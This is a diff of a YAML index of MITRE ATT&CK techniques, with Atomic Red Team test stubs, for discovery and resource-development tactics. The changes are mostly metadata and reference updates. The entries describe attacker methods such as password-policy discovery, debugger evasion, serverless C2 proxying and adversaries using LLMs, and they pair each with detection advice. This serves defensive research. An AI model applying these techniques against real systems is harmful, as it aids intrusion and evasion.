+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -56870,7 +57561,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests:
     - name: Permission Groups Discovery (Local)
@@ -56892,7 +57582,7 @@ discovery:
         name: sh
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -56903,28 +57593,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -56957,9 +57650,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests:
     - name: Examine password policy - macOS
@@ -57012,7 +57704,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -57051,13 +57743,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests: []
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -57098,87 +57788,85 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests: []
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests:
     - name: Get geolocation info through IP-Lookup services using curl freebsd, linux
@@ -57253,7 +57941,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests:
     - name: Security Software Discovery - ps (macOS)
@@ -57270,12 +57957,12 @@ discovery:
         name: sh
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -57283,10 +57970,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -57295,15 +57984,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -57331,9 +58021,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests: []
   T1018:
@@ -57408,7 +58095,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests:
     - name: Remote System Discovery - arp nix
@@ -57533,7 +58219,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests:
     - name: Port Scan
@@ -57660,7 +58345,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests:
     - name: Find and Display Safari Browser Version
@@ -57680,7 +58364,7 @@ discovery:
           /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -57701,12 +58385,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -57731,7 +58414,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -57786,7 +58468,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -57806,7 +58488,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1124:
@@ -57909,7 +58590,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests:
     - name: System Time Discovery in FreeBSD/macOS
@@ -57927,7 +58607,7 @@ discovery:
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -57938,7 +58618,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -58009,29 +58689,28 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -58055,15 +58734,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -58095,17 +58777,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -58158,11 +58839,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -58198,7 +58878,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -58247,43 +58927,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -58296,18 +58945,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
